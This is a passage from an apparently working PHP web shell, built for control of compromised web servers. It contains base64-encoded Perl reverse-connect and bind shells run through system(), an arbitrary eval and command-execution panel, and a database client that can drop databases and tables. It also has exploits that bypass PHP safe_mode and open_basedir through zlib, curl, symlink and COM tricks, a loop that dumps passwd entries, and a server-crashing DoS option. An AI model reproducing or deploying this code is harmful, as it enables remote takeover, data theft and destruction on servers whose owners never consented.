  502. get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
  503. }
  504. }
  505. }
  506. closedir($handle);
  507. }
  508. $datedl=date("y-m-d");
  509. get_files_from_folder($dlfolder,'');
  510. header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");
  511. header("Content-Type: application/download");
  512. header("Content-Length: " . strlen($zipfile -> file()));
  513. flush();
  514. echo $zipfile -> file();
  515. $filename = $_GET['dirname']."-".$datedl.".zip";
  516. $fd = fopen ($filename, "wb");
  517. $out = fwrite ($fd, $zipfile -> file());
  518. fclose ($fd);
  519. }
  520. if ($_REQUEST['cdirname']){
  521. if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
  522. function bcn($ipbc,$pbc){
  523. $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
  524. NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
  525. MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
  526. dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
  527. IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
  528. YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
  529. LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
  530. KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
  531. KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
  532. IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
  533. ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
  534. $opbc=fopen("bcc.pl","w");
  535. fwrite($opbc,base64_decode($bcperl));
  536. fclose($opbc);
  537. system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  538. }
  539. function wbp($wb){
  540. $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
  541. cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
  542. a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
  543. ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
  544. IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
  545. IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
  546. VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
  547. VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
  548. $opwb=fopen("wbp.pl","w");
  549. fwrite($opwb,base64_decode($wbp));
  550. fclose($opwb);
  551. echo getcwd();
  552. system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  553. }
  554. function lbp($wb){
  555. $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
  556. YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
  557. U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
  558. VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
  559. QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
  560. dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
  561. b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
  562. Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
  563. $oplb=fopen("lbp.pl","w");
  564. fwrite($oplb,base64_decode($lbp));
  565. fclose($oplb);
  566. system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  567. }
  568.  
  569. if($_REQUEST['portbw']){
  570. wbp($_REQUEST['portbw']);
  571.  
  572. }if($_REQUEST['portbl']){
  573. lbp($_REQUEST['portbl']);
  574. }
  575. if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
  576. bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
  577.  
  578. }
  579.  
  580. if($_REQUEST['do']=="bc"){
  581. echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
  582.  
  583. }
  584. function copyf($file1,$file2,$filename){
  585. global $slash;
  586. $fpc = fopen($file1, "rb");
  587. $source = '';
  588. while (!feof($fpc)) {
  589. $source .= fread($fpc, 8192);
  590. }
  591. fclose($fpc);
  592. $opt = fopen($file2.$slash.$filename, "w");
  593. fwrite($opt, $source);
  594. fclose($opt);
  595. }
  596. if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
  597. if(is_writable($_REQUEST['cpyto'])){
  598. echo $_REQUEST['address'];
  599. copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
  600. }else{alert("Permission Denied !");}}
  601. if($_REQUEST['cfilename']){
  602.  
  603. echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
  604. }
  605.  
  606. if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
  607. if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
  608. fwrite($ofile4c,$_REQUEST['nf4cs']);
  609. fclose($ofile4c);
  610. alert("File Saved !");}else{alert("Permission Denied !");}}
  611.  
  612. function sqlclienT(){
  613. global $t,$errorbox,$et,$hcwd;
  614. if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
  615. $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
  616. $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
  617. $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
  618.  
  619. }
  620.  
  621. if (isset ($_GET[select_db])){
  622. $getdb=$_GET[select_db];
  623. $_SESSION[db]=$getdb;
  624. $query="SHOW TABLES";
  625. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  626. }
  627. elseif (isset ($_GET[select_tbl])){
  628. $tbl=$_GET[select_tbl];
  629. $_SESSION[tbl]=$tbl;
  630. $query="SELECT * FROM `$tbl`";
  631. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  632. }
  633. elseif (isset ($_GET[drop_db])){
  634. $getdb=$_GET[drop_db];
  635. $_SESSION[db]=$getdb;
  636. $query="DROP DATABASE `$getdb`";
  637. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
  638. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
  639. }
  640. elseif (isset ($_GET[drop_tbl])){
  641. $getbl=$_GET[drop_tbl];
  642. $query="DROP TABLE `$getbl`";
  643. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  644. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
  645. }
  646. elseif (isset ($_GET[drop_row])){
  647. $getrow=$_GET[drop_row];
  648. $getclm=$_GET[clm];
  649. $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
  650. $tbl=$_SESSION[tbl];
  651. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  652. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
  653. }
  654. else
  655. $res=querY($type,$server,$user,$pass,$db,$query);
  656.  
  657. if($res){
  658. $res=htmlspecialchars($res);
  659. $row=array ();
  660. $title=explode('[+][+][+]',$res);
  661. $trow=explode('[-][-][-]',$title[1]);
  662. $row=explode('|+|+|+|+|+|',$title[0]);
  663. $data=array();
  664. $field=$trow[count($trow)-2];
  665. if (strstr($trow[0],'Database')!='')
  666. $obj='db';
  667. elseif (substr($trow[0],0,6)=='Tables')
  668. $obj='tbl';
  669. else
  670. $obj='row';
  671. $i=0;
  672. foreach ($row as $a){
  673. if($a!='')
  674. $data[$i++]=explode('|-|-|-|-|-|',$a);
  675. }
  676.  
  677. echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
  678. foreach ($trow as $ti)
  679. echo "<td bgcolor='F2F2F2'>$ti</td>";
  680. echo "</tr>";
  681. $j=0;
  682. while ($data[$j]){
  683. echo "<tr>";
  684. foreach ($data[$j++] as $dr){
  685. echo "<td>";
  686. if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
  687. echo $dr;
  688. if($obj!='row') echo "</a>";
  689. echo "</td>";
  690. }
  691. echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
  692. if($obj=='row')
  693. echo "&clm=$field";
  694. echo "'>Drop</a></td></tr>";
  695. }
  696. echo "</table><br>";
  697.  
  698. }
  699.  
  700.  
  701.  
  702.  
  703.  
  704. if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
  705. echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
  706. if ($_REQUEST['typE']=='MySQL')echo 'selected';
  707. echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
  708. if ($_REQUEST['typE']=='MSSQL')echo 'selected';
  709. echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
  710. if ($_REQUEST['typE']=='Oracle')echo 'selected';
  711. echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
  712. if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
  713. echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
  714. if ($_REQUEST['typE']=='DB2')echo 'selected';
  715. echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  716. if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
  717. echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
  718. if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
  719. echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  720. if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
  721. echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  722. if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
  723. echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
  724. if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
  725. echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
  726. }
  727.  
  728.  
  729. function querY($type,$host,$user,$pass,$db='',$query){
  730. $res='';
  731. switch($type){
  732. case 'MySQL':
  733. if(!function_exists('mysql_connect'))return 0;
  734. $link=mysql_connect($host,$user,$pass);
  735. if($link){
  736. if(!empty($db))mysql_select_db($db,$link);
  737. $result=mysql_query($query,$link);
  738. if ($result!=1){
  739. while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  740. $res.='[+][+][+]';
  741. for($i=0;$i<mysql_num_fields($result);$i++)
  742. $res.=mysql_field_name($result,$i).'[-][-][-]';
  743. }
  744. mysql_close($link);
  745. return $res;
  746. }
  747. break;
  748. case 'MSSQL':
  749. if(!function_exists('mssql_connect'))return 0;
  750. $link=mssql_connect($host,$user,$pass);
  751. if($link){
  752. if(!empty($db))mssql_select_db($db,$link);
  753. $result=mssql_query($query,$link);
  754. while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  755. $res.='[+][+][+]';
  756. for($i=0;$i<mssql_num_fields($result);$i++)
  757. $res.=mssql_field_name($result,$i).'[-][-][-]';
  758. mssql_close($link);
  759. return $res;
  760. }
  761. break;
  762. case 'Oracle':
  763. if(!function_exists('ocilogon'))return 0;
  764. $link=ocilogon($user,$pass,$db);
  765. if($link){
  766. $stm=ociparse($link,$query);
  767. ociexecute($stm,OCI_DEFAULT);
  768. while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  769. $res.='[+][+][+]';
  770. for($i=0;$i<oci_num_fields($stm);$i++)
  771. $res.=oci_field_name($stm,$i).'[-][-][-]';
  772. return $res;
  773. }
  774. break;
  775. case 'PostgreSQL':
  776. if(!function_exists('pg_connect'))return 0;
  777. $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
  778. if($link){
  779. $result=pg_query($link,$query);
  780. while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  781. $res.='[+][+][+]';
  782. for($i=0;$i<pg_num_fields($result);$i++)
  783. $res.=pg_field_name($result,$i).'[-][-][-]';
  784. pg_close($link);
  785. return $res;
  786. }
  787. break;
  788. case 'DB2':
  789. if(!function_exists('db2_connect'))return 0;
  790. $link=db2_connect($db,$user,$pass);
  791. if($link){
  792. $result=db2_exec($link,$query);
  793. while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  794. $res.='[+][+][+]';
  795. for($i=0;$i<db2_num_fields($result);$i++)
  796. $res.=db2_field_name($result,$i).'[-][-][-]';
  797. db2_close($link);
  798. return $res;
  799. }
  800. break;
  801. }
  802. return 0;
  803. }
  804. function bywsym($file){
  805. if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
  806.  
  807. if(!is_writable("."))
  808. die("not writable directory");
  809. $level=0;
  810. for($as=0;$as<$fakedep;$as++){
  811. if(!file_exists($fakedir))
  812. mkdir($fakedir);
  813. chdir($fakedir);
  814. }
  815. while(1<$as--) chdir("..");
  816. $hardstyle = explode("/", $file);
  817. for($a=0;$a<count($hardstyle);$a++){
  818. if(!empty($hardstyle[$a])){
  819. if(!file_exists($hardstyle[$a]))
  820. mkdir($hardstyle[$a]);
  821. chdir($hardstyle[$a]);
  822. $as++;
  823. }}
  824. $as++;
  825. while($as--)
  826. chdir("..");
  827. @rmdir("fakesymlink");
  828. @unlink("fakesymlink");
  829. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  830. while(1)
  831. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  832. else $num++;
  833. @unlink("fakesymlink");
  834. mkdir("fakesymlink");
  835. }
  836. function bypcu($file){
  837. $level=0;
  838.  
  839. if(!file_exists("file:"))
  840. mkdir("file:");
  841. chdir("file:");
  842. $level++;
  843.  
  844. $hardstyle = explode("/", $file);
  845.  
  846. for($a=0;$a<count($hardstyle);$a++){
  847. if(!empty($hardstyle[$a])){
  848. if(!file_exists($hardstyle[$a]))
  849. mkdir($hardstyle[$a]);
  850. chdir($hardstyle[$a]);
  851. $level++;
  852. }
  853. }
  854.  
  855. while($level--) chdir("..");
  856.  
  857. $ch = curl_init();
  858.  
  859. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  860.  
  861. echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
  862.  
  863. if(FALSE==curl_exec($ch))
  864. die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  865.  
  866. echo ' </textarea> </FONT>';
  867.  
  868. curl_close($ch);
  869. }
  870. if ($_REQUEST['bypcu']){
  871. bypcu($_REQUEST['bypcu']);
  872. }
  873. if($_REQUEST['do']=="bypasscmd"){
  874. if($_POST['bycw']){
  875. echo $_POST['bycw'];
  876. $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
  877. $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
  878. $stdout = $exec->StdOut();
  879. $stcom = $stdout->ReadAll();}
  880.  
  881. echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
  882. }
  883. if($_REQUEST['do']=="bypassdir"){
  884. if($_POST['byoc']){
  885. if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
  886. $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
  887. }else{$bopens="Can Not Bypass This";}
  888. }
  889. if($_POST['byfc']){
  890. curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
  891. $debfc=curl_exec($ch);
  892. }
  893. if($_POST['byetc']){
  894. for($bye=0;$bye<40000;$bye++){
  895. $sbep =$sbep. posix_getpwuid($bye);
  896. }}
  897. if($_POST['byfc9']){
  898. echo "not sucsfull";
  899. }
  900. if($_REQUEST['bysyml']){
  901. $file=$_REQUEST['bysyml'];
  902. bywsym($file);
  903. }
  904. echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
  905.  
  906.  
  907.  
  908.  
  909. }
  910. function printdrive(){
  911. global $slash;
  912. foreach (range("A","Z") as $tempdrive) {
  913. if (is_dir($tempdrive.":".$slash)){
  914. $adri=$tempdrive.":".$slash;
  915. $drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
  916. }
  917. }
  918. return $drivea;
  919. }
  920. if($_POST['nameren'] && $_POST['addressren']){
  921. if(is_writable($_REQUEST['addressren'])){
  922.  
  923. rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
  924. }else{alert("Permission Denied !");}
  925. }
  926. if($_GET['do']=="delete"){
  927.  
  928. if ($_GET['type']=="dir"){
  929. if(is_writable($_REQUEST['address'])){
  930. $dir=$_GET['address'].$_GET['filename'];
  931. deleteDirectory($dir);
  932. alert("Deleted Successful !");
  933. }else{alert("Permission Denied !");}
  934. }elseif($_GET['type']=="file"){
  935. if(is_writable($_GET['address'].$_GET['filename'])){
  936. unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
  937. }else{alert("Permission Denied !");}
  938. }
  939. }
  940. if($_POST['fedit'] && $_POST['namefe']){
  941. if(is_writable($_REQUEST['address'])){
  942.  
  943.  
  944. $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
  945. fwrite($opensave,html_entity_decode($_POST['fedit']));
  946. fclose($opensave);alert("File Saved Successful !");
  947. }else{alert("Permission Denied !");}
  948. }
  949. if ($_POST['evalsource']){
  950.  
  951. eval($_POST['evalsource']);
  952. }
  953. if($_GET['do']=="eval"){
  954. echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value=" eXecute "></form></p>'.$end;exit;
  955. }
  956. if($_GET['do']=="info"){
  957.  
  958. if(ini_get('register_globals')){
  959. $registerg="Enable";
  960. }else{
  961. $registerg="disable";
  962. }
  963. if(extension_loaded('curl')){
  964. $curls="Enable";
  965. }else{
  966. $curls="disable";
  967. }
  968. if(@function_exists('mysql_connect')){
  969. $db_on = "Mysql : On";
  970. };
  971. if(@function_exists('mssql_connect')){
  972. $db_on = "Mssql : On";
  973. };
  974. if(@function_exists('pg_connect')){
  975. $db_on = "PostgreSQL : On";
  976. };if(@function_exists('ocilogon')){
  977. $db_on = "Oracle : On";
  978. };
  979.  
  980. echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
  981. exit;
  982. }
  983. if ($_GET['do']=="cmd"){
  984. echo $head.'
  985. <form method=get action="'.$me.'">
  986. <p align="center">
  987. <textarea rows="19" name="S1" cols="87">';
  988. if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
  989. echo $_GET['execmethod']($_GET['command']);}
  990. if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
  991. echo $_POST['execmethod']($_POST['command']);}
  992.  
  993. if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
  994. popen($_GET['command'],"r");}
  995.  
  996. echo'</textarea></p><p align="center">
  997. <input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
  998. <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option><option value="popen">popen</option>
  999. </select><input type="submit" value="eXecute">
  1000. </p></form>'.$end;exit;}
  1001. if ($_GET['do']=="symlink"){
  1002. echo $head.'
  1003. <form method=post action="'.$me.'">
  1004. <p align="center">
  1005. SymLink With PHP<br><input name=ad1syp size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=SymLink!><hr><p align="center"></form>
  1006. <form method=post action="'.$me.'"><p align="center">
  1007.  
  1008. SymLink With OS : <br><input name=ad1syc size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=SymLink!>
  1009. </p></form>'.$end;exit;}
  1010. if ($_POST['ad1syp'] && $_POST['ad2syp']){
  1011. if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
  1012. alert("Symlink Worked !");
  1013. }else{
  1014. alert("Symlink Not Worked !");
  1015. }}
  1016. if ($_POST['ad1syc'] && $_POST['ad2syc']){
  1017. if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
  1018. alert("Symlink Worked !");
  1019. }else{alert("Symlink Not Worked !");}
  1020. }
  1021. if ($_GET['do']=="d0slocal"){
  1022. echo $head.'
  1023. <p align="center">If You Click This Link This Server Crashed.<br>This Worked In Php 5.3.x : <a href="?dosthisserver=1" target="_blank"><font size=4>Dos This Server I Am Sure </font></a><br>This Worked In Php 4.x.x And 5.2.9 : <a href="?dosthisserver=2" target="_blank"><font size=4>Dos This Server I Am Sure </a>'.$end;exit;}
  1024. if ($_GET['dosthisserver']=="1"){
  1025. function dosserver(){
